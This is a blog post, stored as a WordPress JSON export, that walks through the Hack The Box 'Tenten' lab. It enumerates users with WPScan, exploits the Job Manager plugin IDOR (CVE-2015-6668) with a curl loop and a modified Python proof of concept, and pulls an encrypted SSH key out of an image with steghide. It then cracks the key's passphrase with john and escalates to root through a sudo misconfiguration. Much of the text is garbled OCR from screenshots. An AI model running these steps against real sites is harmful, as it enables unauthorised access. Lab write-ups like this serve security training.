{"id":58,"date":"2021-02-13T19:17:01","date_gmt":"2021-02-13T19:17:01","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=58"},"modified":"2021-02-13T19:17:23","modified_gmt":"2021-02-13T19:17:23","slug":"htb-tenten-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-tenten-walkthrough\/","title":{"rendered":"HTB &#8211; Tenten Walkthrough"},"content":{"rendered":"\n<p>nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/xipqZc8SxTXDUBAGpJAvjNQmo-OQr-tprm4LszjUCPsRUyuFMer28mIjTFkE6vg0MNXtVqlIPVDTliCi-ckEY4UaJrKC--S-qFwKRSeRKy8MnGsMt_JJ5p_z0zEr8iQaL5-z1bAk\" alt=\"Not shown: 998 filtered ports \nPORT STATE SERVICE VERSION \n22\/tcp open ssh \nOpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; \nI ssh-hostkey: \n2048 (RSA) \n256 (ECDSA) \n256 (ED25519) \n80\/tcp open http \nApache httpd 2.4. 18 ( (Ubuntu)) \nI http-generator: WordPress 4.7.3 \nI http-methods: \nSupported methods: GET HEAD POST OPTIONS \nI http-server-header: Apache\/ 2.4. 18 (Ubuntu) \nI http-title: Job Portal &#8211; Just another WordPress site \nService Info: OS: Linux; CPE: kernel \nprotocol 2.0) \"\/><\/figure>\n\n\n\n<p>WPScan &#8211; enumerate users<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/FF-3zPoP0vXq02CukM69EdI93Rqa-FVxtmLRD_Mg6TU2boIAinKDGc79ERCMWYqDuAsmST8uUknsTXqrGxdzKys-D24RVA8t6qzU6IAcOJgcfuYnw28QYdbP8RegMlzzk80kBrfz\" alt=\"wpscan \n--url http:\/\/10.10.10.10 \n-log \n--enumerate u \nNOTE: Gem.gunzip is deprecated; use Gem: : Util.gunzip instead. It will be removed on or after 2018-12-01. \nGem. \ngunzip called from \/usr\/lib\/ruby\/vendor ruby\/ unicode\/display width\/ index. rb:5. \nThe supplied log file \/ root\/ .wpscan\/log.txt already exists. If you continue the new output will be appended. \nDo you want to continue? [Y les [N]o, default: [N] \nWordPress Security Scanner by the WPScan Team \nVersion 2.9.4 \nSponsored by Sucuri \nhttps:\/\/sucuri.net \n@ WPScan , @ethicalhack3r, @erwan I r, @ FireFart \nIt seems like you have not updated the database for some time \nLast database update: 2019-03-18 \nDo you want to update now? [Y les [NIO [A] bort update, default: \nUpdating the Database . \nUpdate completed \nURL: http:\/\/10.10.10.10\/ \nStarted: Sat Jul 6 2019 \nInteresting header: LINK: <http:\/\/10. 10. 10. 10\/ index.php\/wp-json\/&gt;; \nInteresting header: SERVER: Apache\/ 2.4. 18 (Ubuntu) \nXML-RPC Interface available under: http:\/\/10.10.10. 10\/xmlrpc.php \nFound an RSS Feed: http:\/\/10.10.10. 10\/ index.php\/feed\/ \n[HTTP 200] \nDetected 1 user from RSS feed: \nI Name I \nI takis I \nrel=&quot;https : \/\/ api . w. org\/&quot; \n[HTTP 405] \"\/><\/figure>\n\n\n\n<p>WPScan &#8211; Plugin Vulnerability (IDOR) found<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/gC72dTqJNOkvybyec4ah9qgGJPIrNIuE9Xo-MHYCxokQfFdaMfxx9Qu8eSEGb-CrE8SrTCOtxDoQUGaEv1hOI50KsBBNQSvPPwFQkZfqG8chVowzNSECiBm2NkCS-Lb4Hcq6pzKo\" alt=\"[+] Enumerating plugins \n| 1 plugin found: \nfrom passive detection . \nv7.2.5 \nName: job-manager - \nLatest version: O. 7.25 (up to date) \nLast updated: \nLocation: http:\/\/10. 10. 10. 10\/wp-content\/plugins\/job-manager\/ \nReadme: http:\/\/10. 10. 10. 10\/wp-content\/plugins\/job-manager\/readme. txt \nTitle: Job manager <= O. 7.25 \nInsecure Direct Object Reference \nReference: https:\/\/wpvulndb.com\/vulnerabilities\/8167 \nReference: https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/ \nReference: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2015-6668 \nEnumerating usernames . \nWe identified the following 1 user: \nI ID I Login I Name \nIl \nI takis I takis \nJob I \"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/\">https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/<\/a><\/p>\n\n\n\n<p>As the PoC explained in the above URL, I tried to upload CV files first<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/b6mNtrOWbh01y9sk_S-mmFWV3xkgjg-Kge5nQJEvaMo7XP_omTE_R9bP0Kik8st3yvS8XtOm0DX8zt8PLvHs15c1yKgC6Du-FEbrtC9LHTj_xhw_lYvY-_DvoJBuWs8JVsZfkv-J\" alt=\"Request \nRaw Para ms \nCan tent \nCan tent \nCan tent \nCan tent \nHeaders \nHex \nResponse \nRaw Headers \nETT?\/I.1 200 0K \nHex \nHTML \n(Ubuntu} \nRe nder \nfarm-data; iab:nan -field-Il&quot; \nfarm-data; iab:nan -field- It&quot; \nfarm-data; iab:nan -field-15&quot; \nSat, 06 Jul 201g \nServer: Apache\/ 2 . Z. 18 \nVary: Accept -Encoding \nContent -Length: \nCannectian: c lase \nfield-16&quot; \nfilename=&quot; \n$7 WOE \nCan tent - iType: text\/ html; charset=L1iT? \u20228 \nhtml &gt; \nCht:nl lang=&quot; en \u2022US&quot; na \nChead;\u2022 \n-width, \nClink href=&quot;http: \/\/g.mpg . arg\/xfn\/ll&quot;;\u2022 \n\u2022:script;\u2022 (function (html} Chtm1.c1assName = \ninitial-scale=l \nfarm-data; iab:nan - \nCan tent - 'Type i:nage\/png \ntb . png \ntd$ \nhtml . className . replace ( \/\\bno -js\\b\/, \u2022 j s \u2022 (document . documentE1ement} ; \nApplication Job \n< \/ script* \nz \ng \nc \nIy \nz \n1 \nkw \nw \n3 \nc \ndwxS \n5. \nh \n6 \n1 \nz \n\/ nyt} : A \ncYhJ7a a \nEh ya \n6 y El # \nc \n3 \n8 \n6 \n1 \nshh \ndns \u2022prefetch' href=' \/ \/ fan t s. gaagleapis. cam' \ndns\u2022prefetch' href=' \/\/ s. w. arg' \/;\u2022 \nhttpg: \/\/ fants.gstatic. cam' crassarigin rel='precannect' \nalternate&quot; type=&quot; title=&quot; \nhref=&quot;http: \/\/ 10. 10. 10. 10\/ index. php\/feed\/&quot; \/;\u2022 \nalternate&quot; type=&quot; title=&quot; \nClink \nClink \nClink \nClink \nClink \nrel=' \nrel=' \nhref= ' \nre \nre \nJOE Part al \nJOE Part al \n\u2022ragua ; \n\u2022ragua ; \nFeed&quot; \nFeed&quot; \nOKU + \nz \ng \na \nr \nk \ngEJ \n17 \n3 \n5 \n6 \nf CeGW E \nx \ng \nh \nCib \nG \nPer e- \n7 \ng \n7 \n\\ 1 zOM \nytE1 .:SW \n00. \nhref=&quot;http: \/\/ 10. 10. 10. 10\/ index. \/;\u2022 \n\u2022:script type=&quot; text\/iavascript&quot;;\u2022 \nwindow._wpemoj i Settings = \nC &quot;baseUr1&quot; &quot;https. \\ \/ \\ \/ s . w. i 1\/2 . 2 . , &quot;ext&quot; . png&quot; , svgUr1&quot; &quot;https \n\\ \/ \\ \/ s . w. i 1\/2 . 2. , svgExt&quot; . svg&quot; , source&quot; C &quot;concatemoj i&quot; &quot;http \n10 . 10 . 10\\\/wp - includes\\\/j s \\ \/ wp -emoj i -release . min. j 7 . 3&quot; ; \nfunction (a, b, c} [function d (a} [var \nb , c , d, e , f=String. fromCharCode ; if kl I k. fill Text} return! 1 ; switch (k. clearRect O , O , j . width, j . heig \nht} , k. , k. 32px Arial&quot; , a} [case&quot; flag&quot; \u2022 return \nk. fillText (f (55356, 56826, 55356, 56819} , O, , . toDataURL U . length<3e3} (k. (0, o, j . widt \nh,) . height} , k. fillText (f (55356, 57331, 65039, 8205, 55356, 57096} , O, , . toDataURL , k. \n, o, j . width, j . height} , k. fillText (f (55356, 57331, 55356, 57096} , O, , . toDataURLU , h \n; case &quot;emo \nj i4&quot; I return \nk. fillText (f (55357, 56425, 55356, 57341, 8205, 55357, 56507} , O, . toDataURLU , k. clearRect o, j . w \nidth,j . height} , k. fillText (f (55357, 56425, 55356, 57341, 55357, 56507} , O, , . toDataURL \nurn! 1} function e [var \nc=b . createE1ement script&quot; ; c . src=a , c . defer=c . type=&quot; text\/ javascript&quot; , b . getE1ementsByTagName ( &quot;he \netl \notJl \nDone \n1 \nib \nK \nk \nGlh \n1 \nad&quot;} [01 . appendChi1d (c} y var \n=b createE1ement (&quot;canvas&quot;} \nType a search \nterm \nO matches \nType a search \n, . . getContext ; for i=Array flag&quot; , &quot;emoj \nterm \n54.877 bytes \nO matches \n1.881 mills \"\/><\/figure>\n\n\n\n<p>Since wp saves the uploaded files as \/wp-content\/uplaods\/{year}\/{month}\/{file name}<\/p>\n\n\n\n<p>I checked if the I uploaded exist, and yes it&#8217;s uploaded<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/h_Ubq-bXBiPcr01hkXESZL9vVx6TR7cq1bJmUHWDECvGWreVO1-6INT81BdH1ec9SOA6g6QFpfIEiDVAy6Ff9K0b_pyIX1hRtGmAOjcjisxczkI-6dbCWatra3g4s0qmK6XWi3t4\" alt=\"10.10.10.10 \n\/wp-content\/uploads\/2019\/07\/htb.png \"\/><\/figure>\n\n\n\n<p>Also in HTML code of application page, I observed that the uploaded application name appears&nbsp;<\/p>\n\n\n\n<p>I brute forced the pages (idor vulnerability) and interesting application name appeared<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/0-69VuK5gvKDsiz261J4XcylAfawGi9OJz3nkt8NB-zXAFq3SXoKVnv3kYGzILCt_aS2JgliRLRuROd3MC54HXKXQBfhqcyFwVUmlJs2wiZJrKIQgZv323Zhdva1RFaB1_PI41lp\" alt=\"curl -s http:\/\/10.10.10. 10\/ index.php\/jobs\/apply\/8\/ I grep \n<title&gt;Job Application: Pen Tester &#8211; Job \nfor i in $(seq 1 20); do echo -n \n, curl -s http:\/\/10.10.10. 10\/ index.php\/jobs\/apply\/$i\/ I \ngrep \ndone \n1: \n2: \n3: \n4: \n5: \n6: \n7: \n8: \n9: \n11: \n12: \n13: \n14: \n15: \n16: \n17: \n18: \n19: \n20: \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \nApplication : \nHello world! &#8211; Job Portal<\/title&gt; \nApplication : \nSample Page &#8211; Job \nApplication : \nAuto Draft &#8211; Job \nApplication \n&#8211; Job \nApplication : \nJobs Listing &#8211; Job Portal<\/title&gt; \nApplication : \nJob Application &#8211; Job \nApplication : \nRegister &#8211; Job Portal<\/title&gt; \nApplication : \nPen Tester &#8211; Job \nApplication : \n&#8211; Job Portal<\/title&gt; \nApplication : \nApplication &#8211; Job \nApplication : \ncube &#8211; Job \nApplication : \nApplication &#8211; Job \nApplication : \nHackerAccessGranted \nApplication : \nApplication &#8211; Job \nApplication : \nhtb &#8211; Job Portal<\/title&gt; \nApplication : \nApplication &#8211; Job \nApplication : \nhtb &#8211; Job Portal<\/title&gt; \nApplication \n&#8211; Job \nApplication \n&#8211; Job \nApplication \n&#8211; Job \nroot@kati : \/home\/kaIisa\/HTB\/tenten# \"\/><\/figure>\n\n\n\n<p>One can also do the brute force via Burp Intruder<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/YVeGI0yeaqb5ULsaPx2r-G-fSAOkdJAPTJRtjtbGCKXN06sMYlrBBEnkES7rtierYxTF8uReCLWVZPnHnCIV0A-Kpc_V-Y5ubgsjuYGZpqYtpEtZgfbYr9zgzf5JtqEhcC2QADnt\" alt=\"Attack Save Columns \nResults Target Positions \nFilter: Showing all Items \nPayload \nRequest \nPayloads \nRender \nOptions \nStatus \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \nError \ninitial \nTimeout \n1 \n2 \n3 \n4 \n5 \n6 \n7 \n8 \n9 \n10 \n11 \n12 \n13 \n14 \n15 \n16 \n1 \n2 \n3 \n4 \n5 \n6 \n7 \n8 \n9 \n10 \n11 \n12 \n13 \n14 \n15 \n16 \nLength \n57855 \n57857 \n57854 \n57839 \n57748 \n57850 \n57865 \n57847 \n57855 \n57810 \n57860 \n57844 \n57862 \n57906 \n57748 \n57748 \n57748 \nRequest Response \nRaw Headers Hex \nETT?\/I.1 200 0K \nSat, 06 Jul 201g \nServer: Apache\/ 2 . a. 18 (Ubuntu} \nVary: Accept \u2022Encoding \nContent-Length: 57713 \nCannectian: c lase \nCan tent - iType: text\/ html; charset=L1iT? \u20228 \nCht:nl lang=&quot; en \u2022US&quot; class\u2014Una-is na\u2022svg&quot;;\u2022 \nChead;\u2022 \n-width, \nClink href=&quot;http: \/\/gmpg.arg\/xfn\/ll&quot;;\u2022 \n\u2022:script;\u2022 (function (html} Chtm1.c1assName = html. className.rep1ace \nComment \n(document . documentE1ement} ; \nc\/ script* \nClink \nClink \nClink \nClink \nClink \nrel=' \nrel=' \nhref= ' \nre \nre \nApplication. HackerAccessGrantedl Job \nPortal&quot; title* \ndns \u2022prefetch' href=' \/ \/ fan t s. gaagleapis. cam' \ndns\u2022prefetch' href=' \/\/ s. w. arg' \/;\u2022 \nhttpg: \/\/ fants.gstatic. cam' crassarigin rel='precannect' \nalternate&quot; type=&quot; application\/ rss+x.ml&quot; title=&quot; \nalternate&quot; title=&quot; \nJab Part al \nJOE Part al \n\u2022ragua ; \n\u2022ragua ; \ncc ript \nC&quot;baseUr1&quot; &quot;https, \ntype=&quot; text\/ iavascript&quot;;\u2022 \nwindow._wpemoj i Settings = \nw. \\ \/emoj i \\ \/ 2 . 2 . \n11\/721721\/&quot; , &quot;ext&quot; \nPeed&quot; href=&quot;http: \/\/ 10. 10. 10. 10\/ index. php\/feed\/&quot; \/;\u2022 \nPeed&quot; href=&quot;http: \/\/ 10. 10. 10. 10\/ index. \/;\u2022 \n. png&quot; , svgUr1&quot; &quot;https. \\ \/ \\ \/ s . w. i \\ \/ 2 . 2. , svgExt&quot; . svg&quot; , source&quot; C &quot;concatemoj i&quot; &quot;http \n10 \"\/><\/figure>\n\n\n\n<p>I used the PoC exploit in the blogpost above and modified the exploit a bit as below:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/6pE_qMzxsW3pc8Zzi65GvpcT9WL67qYqpldWCcFm2fxLK5lbscefgR3NI1DhS7okRGEpqHSj-APvbSZb9qd9oHY4UGLpVb8RmHnnQi6UdOkDDp4MQD7dIGTQU8oQZpaQTKPvq7Yz\" alt=\"import requests \nprint \nCVE-2015-6668 \nTitle: CV filename disclosure on Job-manager WP Plugin \nAuthor: Evangelos mourikis \nBlog: https:\/\/vagmour.eu \nPlugin URL: http:\/\/www.wp-jobmanager.com \nVersions: \n\u00ab=0.7 .25 \n= raw input( 'Enter a vulnerable website. \nwebsite \n= raw input( 'Enter a file name. \nfilename \nfilename2 \n= filename. replace( \nfor year in \nfor i in \n, 'gif' , 'pngl}: \nfor extension in {'doc' , 'pdf' , 'docx' , ' \njpg' , ' jpeg' \nURL = website + &quot;\/wp-content\/uploads\/&quot; \n+ str(year) + + \n. format (i) + \n+ filename2 + \n\u2022 + extension \nreq = requests. get (URL) \nif req. status \nprint [+] URL of CV found! \n+ URL \"\/><\/figure>\n\n\n\n<p>And found a file with the name HackerAccessGranted<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/gNa7m2zHPe3AStojuFOfS1u0G1qVZk2KCxA8J_ItNwrQEU069PG9G2c_iEp4gl5VnORONlNJDzL8o5GlPXsXnLoa0Kt9dyCoD3W1qdV_LsHGJqZ2RFGTc8uJJ1yNCib5H__NzT8l\" alt=\"python cve-2015-6668.py \nCVE-2015-6668 \nTitle: CV filename disclosure on Job-manager WP Plugin \nAuthor: Evangelos mourikis \nBlog: https:\/\/vagmour.eu \nPlugin URL: http:\/\/www.wp-jobmanager.com \nVersions: \nEnter a vulnerable website: http:\/\/10.10.10.10 \nEnter a file name: HackerAccessGranted \n[+] URL of CV found! http:\/\/10. 10. 10\/wp-content\/uploads\/2017\/04\/HackerAccessGranted.jpg \"\/><\/figure>\n\n\n\n<p>I downloaded the jpg file and checked for any info hidden in it using the following tools<\/p>\n\n\n\n<p>strings HackerAccessGranted.jpg | less<\/p>\n\n\n\n<p>exiftool HackerAccessGranted.jpg<\/p>\n\n\n\n<p>binwalk HackerAccessGranted.jpg<\/p>\n\n\n\n<p>steghide &#8211;extract -sf HackerAccessGranted.jpg (-sf for source file option)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/g8wdVjthm7M7zlEUOhPt91N8SghrOtjNrFd2ORRYwfWHZ5spQg433UtHNxmuPm2jC-cwqtq5zJFK9pKE0dH2gXONOLm472g7nmbTwGAkNA-eWSwHl3COpeepjkkMGitJk_pITARX\" alt=\"extracting options: \ns f, --stegofile \n-sf <filename&gt; \np, - -passphrase \n-p <passphrase&gt; \nxf, --extractfile \n-xf <filename&gt; \nf, -- force \nq, --quiet \nv, --verbose \nselect stego file \nextract data from \nspecify passphrase \nuse <passphrase&gt; to extract data \nselect file name for extracted data \nwrite the extracted data to <filename&gt; \noverwrite existing files \nsuppress information messages \ndisplay detailed information \noptions for the info command: \np, - -passphrase \n-p <passphrase&gt; \nspecify passphrase \nuse <passphrase&gt; to get info about embedded data \nTo embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt \nTo extract embedded data from stg. jpg: steghide extract -sf stg. jpg \nsteghide \n--extract -sf HackerAccessGranted.jpg \nEnter passphrase: \nwrote extracted data to &quot;id rsa&quot; . \"\/><\/figure>\n\n\n\n<p>Look the content of id_rsa file<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/JX_EwM0TWNch_4EYc1EOhoD-2elhR27C_6w5xThrYBh9vNi1p-kltfPFDNhN-j0GiX1-YARLwZczCQaON3uy7VrXGg0OsDRZFmm6d79lZqc1M5Hb87bnH1oUdP4lbnmorTlrGfUN\" alt=\"-BEGIN RSA PRIVATE KEY----- \nProc-Type: 4,ENCRYPTED \nDE-K-lnfo: AES-128-C8C, 7265FC656C429769E4CIEEFC618E660C \n\/HXcU80T3Jhzb1H7uF9Vh7faa76XH1dr\/ChOpDnJunjdmLS\/1aq1ku1Q3\/RF\/Vax \ntj Tzj \/V5h8EcL5GcHv3es romsoj rkpawfbvwbR+XxFIJuz7zLfd\/vDo \n1KuGrCrRRsipkyae5Kiq1C137bmWK9aE\/4c5X2yfVTOEeODdWOrAoTzGufWtThZf \nK2nyOiTGPndD7LMdm\/0505As+ChDYFNphVIXDgfDzHgonKMC4iES7Jk8Gz20PJsm \nSdWCazF6p1Eqh14NQrnkd8kmKqzkpfWqZDz3\u00e6g6f49GYf97aM5TQgTday20FqoXH \nWPhK3CmOtMGqLZA01\u00e6oNuwXSOH53t9FG7GqU31wj7nAGW8pfGodGwedYde4z108P \nVbNu1RMKOkErv\/NCiGVRcK6k5Qtdbwforh+6bmjmKE6QvMXbesZtQOgC9SJZ31MT \nJOIY838HQZgOsSw1jDrxuPV2DUIYFROW3kQrDVUym080xOwOf\/MITxvrC2wvbHqw \nAAniuEotb90az\/Pfau300\/DVzYkq199VDX\/Y81xd168qqZbXsM9s\/aMCdVg7TJ1g \n2gxE1pV7U9kxi1\/RNdx5UASFpvFs1mOn7CTZ6N44xiatQUHyVINgpNCyjfEmzxmo \n6FtWaVqbGStax1iMRC198ZOcRkX2VoTvT1hQw74rSPGPMEH+OSFksXp7Se\/wCDMA \npYZASVx160NWQGpAj5z4Wha8S8Er8ZVmFfykuh4107Tsnxa9WNoWX06XOFSOPMk \ntNp8bPPq15+M+dSZaObad9E\/mnv8faSKlvkn4epk87nOVk01ssLcecfxi+bWnGPm \nKowyqU6iuF28w1J98towgnWrUgt1qubmkOwkf+108ig7komyT9KfZegR70F92xE9 \n41WDTxfLy7501DHORrmOf77D4HvNC2qQOdYHkApd1dk4b1cb71Fi5WF183RruygF \n2GSre8yXn5g915Ya82uC30+ST5Q8eY2pT88k2D61kmt6u11LnoOSkr3v9r6JT5J7 \nLOUtmgdUqf+35\u00e6cA70L\/w11POE04UOaaGpscDg059DL88dzv1hyHg4T1fd9xWtQS \nVxmzURTwEZ43j SxX94PL lwcxzLV6FfRVAKdbi6kACsgVeULi1+YAfPj 11yVOm1kv \n5HV\/bYJvVatGtmkNumtuK7NOH8iE7kCDxCnPnPZaOnWoHDk4yd50R1zznkPna74r \nXb09FdNeLNmER\/7GGdQARkpd52Uur08f1JW2wyS1bdgb8gw\/G+puFAR8z7ipgj4W \np9LoYqiuxaEbiD5zUzeOtKAKL\/nfmzK82zbdPxmrv7TvHUSSWEUC409QKi83amgf \nywmjw30tH+ZLn8my\/fS61VQ50nV6rVhQ7+LRKe\u00e6q1Yidzfp1911L8Uidbs8fWAz8 \n9XkOsH5c1NQT6spo\/nQM3UN1kkn\u00e6a7zKPJmetHs040b3xKLiSpw5f35SRV4rF+mO \nv1UE1\/YssXM07TK6i81XCuuOUtOpGiLxNVR1aJvbGmazLWCSyptk5fJhPLkhuK+J \nYoZn9FNAuRiYFL3rw+6q01+KoqzoPJJek6WHRy80SE+8Dz1ysTLIP86tGKn7EWnP \nEND RSA PRIVATE KEY----- \nid r sa (END) \"\/><\/figure>\n\n\n\n<p>Since it&#8217;s encrypted, we need to decrypt it first to use it<\/p>\n\n\n\n<p>Turn the file into john crackable form with sshng2john tool<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/8uPtIIqeM3h9d3I5vRqqlwSlfM7xeC0KbIkqadbFp8W2U2t5ZtGzsgkj5nZnJGpuQgvHCjo9Tn07aEOy0jBnW0F3k0wK034xBqCSUzeYxjIiuXq3qXKevyNTbaleUPivTBOmj4BR\" alt=\"python sshng2john.py id rsa &gt; id john \ncat id john \n16 \nid rsa:$sshng$1$16$7265FC656C429769E4CIEEFC618E660C$1200$fc75dc501393dc98736e51fbb85f5587b7da6bbe971c876bfc2874a439c9ba78dd98b4bf95aab592e950dff445fd56b1b634f \n38ff5798411 \n8eOdd5b4acOa 13cc6b9f5ad4e 165f2b69f2d224c63e7743ecb3 \n9262aace4a5f5aa643cf7faoe9fe3d1987fdeda3394d081375acb6a05aa85c758f84adc29b4b4c1aa2d9034d7ea0dbb05d2d07e77b7d146ec6a94df5c23ee7006581a5f1a8746c1e75875ee3394e04 \n16de442bOd55329 \nb4068c4ecOe7ff3254f1bebOb6c2f6c7ab00009e2b84a2d6fda1acff3df6aedce3bfOd5cd892a23df550d7fd8048c5dd7af2aa996d7bOcf6cfda30275583b4c9d60daOc4496957b53d9318a5fd135d \nc79500485a6f16c9663a7ec24d9e8de38c626ad4141f2575360a4dOb28df10ccd7328e85b56695a9b192b5ac7588c442d7df19d1c4645f65684ef4e5850c3be2b48f18f3041fe392164b17a7b49eff \n0083300a58640495c65ea835640afa9023e73e1685a052044afc6559857f292e878968ed3b27c5af56368597a3a5f415238f324b4da416cf3ead79f8cf9d49968e6da77d13f327bc17da48a96f927e \nlea6407b9f45643b5b2c2dc79c7f lee817ddb 113de085834f 17cbcbbe68d43 \n1292bde \nff6be894f927b2f452d320754a9ffb7e7e700ef42ffc0894fd04d3853469a1a9b1cOeOd39f432fcf1dcef221c878384e57ddf715ad4125713335114f0119e378d2c57f783cb970731ccb57a15f4550 \nOa75b8ba9000ac8157942e223ec807cf8c82325749b592fe4757f6d826f55ab46b6690db8cb6e2bb34e1fc884ee4083c429cf9cf65ad275a81c3938c9de74465cf39e43e76bbe2b5dba3d15d35e2cd \n98447fec619d400464a5de7652eaf4f 11b883e7353378eb4aOOa2ff9df9b32bcdb36dd3f 132bbfb4ef Id449258450 \n1355448689bdb la66b32d6092ca9b64e5f2613cb921b8af89628667f45 \n340b9189814bdebc3eeaaa25f8aa2ace83c925e93a587472foe484fbc0f3d72b132c83c1ead18a9fb1169cf \nroot@kati : \/home\/kaIisa\/HTB\/tenten# \"\/><\/figure>\n\n\n\n<p>Then crack the passphrase<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/fqtNBGVe-S5M0oD8QI0KNmOZfpAE0tYIIf8UeK8Z_ffDVOtATFS_QsnKpTLIWcJZ5yILcmxcFr1en183fE7wzPQEp7Zc7beMuGHG5l9M09E8M2UKeH0cf0k_MIjMS2X5CUrkc6Nr\" alt=\"john id john --wordlist=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8 \nLoaded 1 password hash (SSI-I [RSA\/DSA\/EC\/OPENSSH (SSI-I private keys) 32\/32]) \nCost 1 (KDF\/cipher [O=MD5\/AES 1=MD5\/3DES 2=8crypt\/AES]) is O for all loaded hashes \nCost 2 (iteration count) is 1 for all loaded hashes \nWill run 4 Openmp threads \nNote: This format may emit false positives, so it will keep trying even after \nfinding a possible candidate. \nPress 'q' or Ctrl-C to abort, almost any other key for status \nsuperpassword \n(id rsa) \"\/><\/figure>\n\n\n\n<p>Change the permission of rsa file to 600 and login to takis user with the passphrase cracked<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/f4XapZTVpYL-EfWbzkRQslRG9HbV3OtT7v3-3KaJJUV-Jk89h721ntX_53XHErpyT7xwY4VLWVQZL53No6D3yFV01F1sZD-DTCk2NNFx_H4-iguaqTZDx13ym9LVUrd9YgSi9k2w\" alt=\"chmod 600 \nid rsa \nssh -i id \nr sa takis@10.10.10.10 \nEnter passphrase for key 'id rsa' : \nWelcome to Ubuntu 16.04.2 L TS (GNU\/ Linux 4.4.0-62-generic x86 64) \n* Documentation: \n* management: \n* Support: \nhttps:\/\/help . ubuntu . com \nhttps \/\/ landscape . canonical . com \nhttps : \/\/ubuntu . com\/advantage \n65 packages can be updated. \n39 updates are security updates. \nLast login: Fri may 5 2017 \ntakis@tenten : \u2014$ \"\/><\/figure>\n\n\n\n<p>Priv Esc<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/qTaxa_ribLqX56OanpaOLvti_zwBKJH-5Q6f0FkKIhqED5Ge9_SxHCI3hCM8WDC5k9Nop5U1yu3SwgMub3P6ORU3o1tjzpzRMXomESp9OFfcfhaQQ1CzRNOfY_N1TQRCeb4i3m-S\" alt=\"takis@tenten:\u2014$ sudo -l \nmatching Defaults entries for takis on tenten: \nenv reset, mail badpass, secure \nUser takis may run the following commands on tenten: \n(ALL : ALL) ALL \n(ALL) NOPASSWD: \/bin\/fuckin \"\/><\/figure>\n\n\n\n<p>So takis user can run \/bin\/fuckin as root&nbsp;<\/p>\n\n\n\n<p>The content of the file can be seen below, it gets arguments and executes them<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/tsGodnqdwOmyE64MctC-aY8OPIuNJfME8I6tH23JZ4w67MOoHOX1oZS4zfbo6iGq3n5Mm7l_mkCHF-XRENsokxwut9LqsQiNosup-JRrx-PRo4ievvFyRVlU7ZX5Pr6-bdRqBTDy\" alt=\"\/ bin\/ bash \n\/bin\/fuckin (END) \"\/><\/figure>\n\n\n\n<p>We use sudo \/bin\/fuckin bash and become root<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/yX_sMRTfGGUrgpJnHhGtAFv05RutKqJv4N_BjSTL6dD0DF23qNohC4eDlvgMEFI0RUqUlYJrwrYpfyaV7VOv2TK9vr2yBalI_gMjxMQ7snPA6HUnXl7c31lWFhnpaS8RmE4SLO1B\" alt=\"takis@tenten:\u2014$ cat \/bin\/fuckin \n\/ bin\/ bash \ntakis@tenten:\u2014$ sudo \/bin\/fuckin bash \nwhoami \nroot \nroot@tenten : \"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>nmap WPScan &#8211; enumerate users WPScan &#8211; Plugin Vulnerability (IDOR) found https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/ As the PoC explained in the above URL, I tried to upload CV files first Since wp saves the uploaded files as \/wp-content\/uplaods\/{year}\/{month}\/{file name} I checked if the I uploaded exist, and yes it&#8217;s uploaded Also in HTML code of application page, I&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-tenten-walkthrough\/\">Continue reading <span 